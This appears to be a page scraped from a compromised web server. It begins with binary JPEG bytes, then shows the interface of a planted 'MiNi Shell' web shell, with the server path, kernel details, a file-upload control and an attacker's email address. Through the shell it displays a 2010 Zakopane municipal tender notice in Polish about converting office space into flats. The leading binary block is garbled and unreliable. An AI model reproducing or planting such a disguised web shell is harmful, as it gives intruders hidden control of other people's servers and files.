JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/17895-N-2010.html

<p class="kh_header"><b>Zakopane: ZP/341/3/10 wykonanie dokumentacji projektowo-kosztorysowej  adaptacji na lokale mieszkalne części budynku przy ul. Jagiellońskiej 7 w Zakopanem</b><br>
<b>Numer ogłoszenia: 17895 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/3/10 wykonanie dokumentacji projektowo-kosztorysowej  adaptacji na lokale mieszkalne części budynku przy ul. Jagiellońskiej 7 w Zakopanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostarczenie dokumentacji projektowo - kosztorysowej dla zadania inwestycyjnego nr 13/08 Adaptacja na lokale mieszkalne części budynku zlokalizowanego przy ul. Jagiellońskiej 7 w Zakopanem.

1.	Zakres przedmiotu zamówienia obejmuje :
1.1.	ustalenie rodzaju i szczegółowego zakresu robót budowlanych,
niezbędnych do zmiany dotychczasowego sposobu użytkowania lokali biurowych 
na lokale mieszkalne i  wyodrębnienia samodzielnych lokali  wraz z pomieszczeniami przynależnymi i osiągnięcia przez nie wymaganych standardów technicznych, 
1.2.	pozyskanie aktualnych map do celów projektowych, zawierających wszystkie niezbędne naniesienia do wykonania prac projektowych,
1.3.	wykonanie inwentaryzacji obiektu w tym inwentaryzacji instalacji wewnętrznych, niezbędnych do sporządzenia dokumentacji projektowo-kosztorysowej wyodrębnienia samodzielnych lokali wraz z pomieszczeniami przynależnymi, 
1.4.	wykonanie ekspertyzy technicznej, o której mowa w art. 71 ust.1, p2, pp.5 Prawa Budowlanego,
1.5.	pozyskanie geotechnicznych warunków posadowienia i w zależności od potrzeb wyników badań geologiczno-inżynierskich niezbędnych do opracowania dokumentacji projektowej,
1.6.	wykonanie oceny energetycznej budynku w celu optymalizacji gospodarki cieplnej,
1.7.	 wykonanie na podstawie uzyskanej przez Zamawiającego koncepcji architektonicznej  i  decyzji WZ kompletnego  projektu budowlanego rozbudowy, zabezpieczenia przed osuwająca się skarpą ( mury oporowe),  i zmiany przeznaczenia pomieszczeń biurowych wraz z pomieszczeniami przynależnymi, komunikacją i pom. technicznymi, zawierającego wszystkie niezbędne opracowania branżowe 
w tym: projekt zagospodarowania, projekt architektoniczno budowlany, projekt zieleni, charakterystykę geotechnicznych warunków posadowienia obiektu, sposobu wykorzystania odnawialnych źródeł energii  i informację bioz,
1.8.	pozyskanie wszystkich niezbędnych decyzji, postanowień, uzgodnień, opinii, zapewnienia dostawy mediów i włączenia do dróg publicznych, stosownie 
do obowiązującego prawa i potrzeb wynikających z zakresu opracowanej dokumentacji projektowej i zapewnienia jej kompletności, 
1.9.	wykonanie kompletnego projektu wyodrębnienia samodzielnych lokali wraz 
z pomieszczeniami przynależnymi i wspólnymi, w tym określenie udziału  poszczególnych lokali w części wspólnej oraz działce przynależnej do obiektu, 
1.10.	uzgodnienie projektu wyodrębnienia z właścicielami wyodrębnianych lokali poprzez umieszczenie pisemnych klauzul na wykonanym projekcie wyodrębnienia,
1.11.	przygotowanie kompletnego wniosku wraz z załącznikami do uzyskania pozwolenia 
na budowę i zmianę dotychczasowego sposobu użytkowania oraz zatwierdzenia projektu budowlanego,
1.12.	przygotowanie kompletnego wniosku i uzyskanie uzgodnienia projektu wyodrębnienia samodzielnych lokali wraz z pomieszczeniami przynależnymi ze Starostą Tatrzańskim,
1.13.	wykonanie projektów wykonawczych  w zakresie niezbędnym do uzupełnienia projektu budowlanego, w tym jego opracowań branżowych,
1.14.	wykonanie kosztorysu inwestorskiego z podziałem na zadania,
1.15.	wykonanie przedmiaru robót z podaniem podstawy wycen i podziału na zadania, uwzględniającego możliwość etapowania zadania,
1.16.	wykonanie Specyfikacji Technicznych Wykonania i Odbioru Robót na wszystkie elementy kosztorysu, dostosowanych do specyfiki  i skomplikowania realizowanych robót, oraz proponowanego podziału na zadania, z wykluczeniem niedostosowanych 
do projektowanego zakresu dostępnych specyfikacji wzorcowych,
 Przyjęte przez Projektanta założenia wstępne do zmiany dotychczasowego sposobu użytkowania oraz wyodrębnienia lokali, szczególnie co do ilości i zakresu funkcjonalnego samodzielnych lokali,  wymagają  uzgodnienia przez Zamawiającego przed dalszym kontynuowaniem prac projektowych.


2	Orientacyjne dane techniczno użytkowe obiektu:
2.1.	kubatura 10 830  m 3 ( całość obiektu),
2.2.	pow. użytkowa:  2 506,0  m2 (całość obiektu),
2.3.	pozostałe parametry techniczne dostępne są w załącznikach graficznych do SIWZ,

3	Opracowana dokumentacja ma służyć:
3.1.	uzyskaniu pozwolenia na budowę oraz zmianę dotychczasowego sposobu użytkowania łącznie z zatwierdzeniem projektu budowlanego,
3.2.	przeprowadzeniu zamówienia publicznego na wykonanie robót objętych opracowana dokumentacją,
3.3.	wykonaniu robót budowlanych zmierzających do zmiany dotychczasowego sposobu użytkowania i wyodrębnienia samodzielnych lokali,
3.4.	notarialnego ustanowienia odrębności lokali dla poszczególnych użytkowników, 

4	Forma opracowania dokumentacji:
4.1.1	dokumentacja zbroszurowana (w sposób umożliwiający bezpośrednie wpięcie 
do segregatora biurowego) w ilości dla każdego z wyodrębnionych zadań: 
4.1.2	projekt  budowlany 6 szt.
4.1.3	projekt wyodrębnienia samodzielnych lokali 6 szt
4.1.4	projekt  wykonawczy 4 szt.
4.1.5	specyfikacje istotnych warunków wykonania i odbioru robót  4 szt.
4.1.6	przedmiar robót (kosztorys ślepy) 2 szt.
4.1.7	kosztorys inwestorski 2 szt.
4.2.	dokumentacja elektroniczna w formacie Word, PDF oraz dodatkowo kosztorys inwestorski w zapisie  umożliwiającym odczyt w formacie Excel.
4.3.	dokumentacja powinna być zgodna z obowiązującymi przepisami, w tym:
4.3.1	Prawem budowlanym (tekst jednolity: Dz. U. 2006 r. Nr 156, poz. 1118 
z późn. zm.),
4.3.2	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego
( Dz U. Nr 202 poz.2072 ze zmianami ),
4.3.3	 Ustawą z dnia 24 czerwca 1994 r o własności lokali ( tekst jednolity Dz.U. 
z 2000 r, Nr 80,poz.903 z późn. zm.),
4.3.4	Ustawą z dnia 21 czerwca 2001 r o ochronie praw lokatorów, mieszkaniowym zasobie gminy i o zmianie Kodeksu Cywilnego ( Dz.U.  z 2001 r ,Nr 71 poz. 733),

5.	Cel planowanego zadania, który powinien zostać uwzględniony 
przy opracowywaniu dokumentacji projektowo - kosztorysowej obejmuje 
w szczególności:
5.1.	uzyskanie maksymalnej ( pożądana ilość to 21 szt.), uzgodnionej z Zamawiającym, ilości lokali mieszkalnych, ze szczególnym zwróceniem uwagi na pozyskanie mieszkań   jednopokojowych  przez zaprojektowanie  wszelkich prac adaptacyjnych umożliwiających zmianę dotychczasowego sposobu użytkowania części budynku biurowego, uwzględniając rozwiązania przyjęte w załączonej koncepcji lub proponując rozwiązania równorzędne , uzgodnione uprzednio z Zamawiającym, 
5.2.	dostosowania zagospodarowania terenu do nowej funkcji budynku, w tym komunikacji wewnętrznej - dojazdów, dojść, murów oporowych, stanowisk postojowych samochodów osobowych lokatorów, uwzględniając rozwiązania przyjęte w załączonej koncepcji lub proponując rozwiązania równorzędne uzgodnione uprzednio 
z Zamawiającym,
5.3.	zmianie dotychczasowego przeznaczenia z biurowego na cele mieszkalne  podlegają pomieszczenia oznaczone w załączonej do wniosku inwentaryzacji symbolami: 
5.3.1.	na rys. 5 - II piętro od nr 2.1 do nr 2.38,
5.3.2.	na rys 6 - III piętro od nr 3.1 do nr 3.19,
5.4.	wyodrębnienie samodzielnych lokali wraz z pomieszczeniami przynależnymi, obsługującą je komunikacją i pomieszczeniami technicznymi w sposób uzgodniony 
z Zamawiającym tworząc 4 samodzielne lokale wraz z pomieszczeniami przynależnymi oraz część wspólną,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium przetargowego<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O  udzielenie  zamówienia  mogą  ubiegać  się  wykonawcy,  którzy spełniają warunki, dotyczące: 
1) posiadania uprawnień do wykonywania określonej działalności lub  czynności,  jeżeli  przepisy  prawa  nakładają  obowiązek  ich posiadania; 
2) posiadania wiedzy i doświadczenia; 
3) dysponowania  odpowiednim  potencjałem  technicznym  oraz osobami zdolnymi do wykonania zamówienia; 
4)   sytuacji ekonomicznej i finansowej
oraz nie  podlegają  wykluczeniu z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy.

Opis sposobu dokonywania oceny spełnienia warunków:

  Wiedza i doświadczenie: 
Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w ciągu ostatnich 3 lat przed  upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie świadczył  co najmniej 2  usługi polegające na wykonaniu dokumentacji projektowo - kosztorysowych  budowy, przebudowy, rozbudowy, budynku mieszkalnego lub zamieszkania zbiorowego o kubaturze większej od 1000 m3 i wartości dokumentacji  nie mniejszej niż 50 000 PLN  każda,

(Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia). )
Dysponowanie osobami zdolnymi do wykonania zamówienia 
Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że  będzie dysponował co  najmniej 1 osobą   posiadającą uprawnienia budowlane w specjalności architektonicznej bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych przepisów, należącą  do właściwej izby Inżynierów Budownictwa, dla autora projektu budowlanego i sprawdzającego,
       oraz wykaże ,że zapewnią do wykonania opracowań branżowych udział osób posiadających uprawnienia do pełnienia funkcji projektanta bez ograniczeń w specjalności konstrukcyjno - budowlanej i instalacyjnej w zakresie instalacji i urządzeń cieplnych, wod-kan i instalacji i urządzeń elektrycznych, lub odpowiadające 
im wydane na podstawie wcześniejszych przepisów łącznie z aktualnym zaświadczeniami o wpisie na listę samorządu zawodowego

          (     Wykonawca może polegać na osobach zdolnych do wykonania zamówienia   innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. )
 
Dysponowanie odpowiednim  potencjałem  technicznym  
Warunek zostanie uznany za spełniony ,jeżeli  wykonawca  złoży w tym  zakresie stosowne oświadczenie 

Potencjał  finansowo- ekonomiczny 
   Warunek zostanie uznany za spełniony ,jeżeli  wykonawca   złoży w  tym  zakresie  stosowne oświadczenie 

 Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania   braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt. 2 ustawy, wystawionego nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w  stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt.2 ustawy-  załącznik nr  2 do  siwz.

2. podpisane oświadczenie o spełnianiu warunków, stanowiący  załącznik nr 1   do siwz,

3. podpisane oświadczenie o braku podstaw do wykluczenia Wykonawcy z postępowania na podstawie art. 24 ust.1 ustawy - stanowiące załącznik nr 2 do  siwz

  
4. na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć   
do    oferty  wykaz usług  ( należy wypełnić   załącznik nr 4    do   siwz) z  ostatnich 3 lat przed  upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie z którego będzie wynikać ,że  świadczył  co najmniej 2  usługi polegające na wykonaniu dokumentacji projektowo - kosztorysowych  budowy, przebudowy, rozbudowy, budynku mieszkalnego lub zamieszkania zbiorowego o kubaturze większej od 1000 m3 i wartości dokumentacji  nie mniejszej niż 50 000 PLN  każda,

             
Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty (np; referencje) potwierdzające, że podane w wykazie   usługi zostały wykonane należycie.

5.wypełniony druk oferty stanowiący załącznik nr 3 do  siwz(wykonawca może założyć ofertę na własnym formularzu, lecz jego  treść i układ muszą być zgodne z formularzem załączonym do siwz).

6.na potwierdzenie dysponowania  osobami zdolnymi do wykonania zamówienia , wykonawca ma do oferty załączyć wykaz osób( należy wypełnić załącznik nr 5 do siwz)  które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności, oraz informacji o podstawie dysponowania tymi osobami.
Z wykazu musi wynikać że wykonawca dysponuje lub będzie dysponował : 
co  najmniej 1 osobą   posiadającą uprawnienia budowlane w specjalności architektonicznej bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych przepisów, należącą  do właściwej izby Inżynierów Budownictwa, dla autora projektu budowlanego i sprawdzającego,       oraz wykaże ,że zapewnią do wykonania opracowań branżowych udział osób posiadających uprawnienia do pełnienia funkcji projektanta bez ograniczeń w specjalności konstrukcyjno - budowlanej i instalacyjnej w zakresie instalacji i urządzeń cieplnych, wod-kan i instalacji i urządzeń elektrycznych, lub odpowiadające 
im wydane na podstawie wcześniejszych przepisów łącznie z aktualnym zaświadczeniami o wpisie na listę samorządu zawodowego

Do niniejszego wykazu należy załączyć oświadczenie, że osoby , które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają  obowiązek posiadania  takich uprawnień 

 Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej składa dokumenty zgodnie z przepisami Rozporządzenia  Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzaju dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226 poz. 1817) 

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt XIII -1  specyfikacji, składa dokument wystawiony w kraju , w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Uwaga! Dokument, o którym  mowa  powyżej powinien  być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w miejscu zamieszkania  osoby  lub w  kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o którym mowa  w pkt XIVppkt. ,  zastępuje się go  dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania  osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty sporządzone w języku obcym musza być złożone wraz z tłumaczeniem na język polski.


Forma składania wymaganych  dokumentów .
1.Dokumenty  są  składane  w  oryginale  lub  kopii  poświadczonej  za  zgodność  z 
  oryginałem  przez  wykonawcę.  .
 2.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku  podmiotów,  o  których  mowa  w  §  1  ust.  2  i  3 Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia  2009 r. w sprawie rodzajów dokumentów, jakich może  żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą  być  składane  (Dz. U. Nr 226 poz.1817 )  kopie  dokumentów  dotyczących  odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.   

3.Zamawiający  może  żądać  przedstawienia  oryginału  lub  notarialnie  poświadczonej  kopii dokumentu  wyłącznie  wtedy,   gdy  złożona  kopia  dokumentu  jest  nieczytelna  lub  budzi wątpliwości co do jej prawdziwości. 
4. Dokumenty  sporządzone  w  języku  obcym  są  składane  wraz  z  tłumaczeniem  na  język polski..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji pok.21
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok.8
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W oparciu o art.144 ust.1 ustawy zamawiający informuje, że:

1.Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych 
w ofercie, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nowego kluczowego specjalistę. Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących przypadkach:
-śmierci, choroby lub innych zdarzeń losowych kluczowego specjalisty,
-nie wywiązywania się kluczowego specjalisty z obowiązków wynikających z umowy,
-jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.).
2.Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy.
3.W przypadku zmiany kluczowego specjalisty, nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
4.Wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie 
z żądaniem zamawiającego w terminie wskazanym we wniosku zamawiającego
5.Zamawiający zastrzega sobie konieczność wprowadzenia przez Wykonawcę  ewentualnych  i wynikających z ostatecznej treści uzyskanej decyzji WZ zmian 
do przyjętych rozwiązań projektowych,

Creat By MiNi SheLL
Email: jattceo@gmail.com